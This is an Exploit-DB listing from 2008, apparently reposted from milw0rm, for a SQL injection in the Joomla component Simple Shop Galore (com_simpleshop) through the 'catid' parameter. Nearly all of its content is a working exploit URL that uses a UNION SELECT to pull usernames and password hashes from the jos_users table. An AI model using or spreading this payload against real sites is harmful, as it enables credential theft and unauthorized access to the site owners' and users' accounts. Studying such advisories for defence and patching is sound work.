Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection

EDB-ID:

5833


Author:

eXeCuTeR

Type:

webapps


Platform:

PHP

Date:

2008-06-16


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection

------------------------------------------------------

@ AUTHOR: eXeCuTeR <executerx[at]gmail[dot]com>

------------------------------------------------------

@ HOME: milw0rm.com

------------------------------------------------------

@ DORK: :\

------------------------------------------------------

@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
					~EOF~

side note:

same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it.  Original author: eXeCuTeR.

# milw0rm.com [2008-06-16]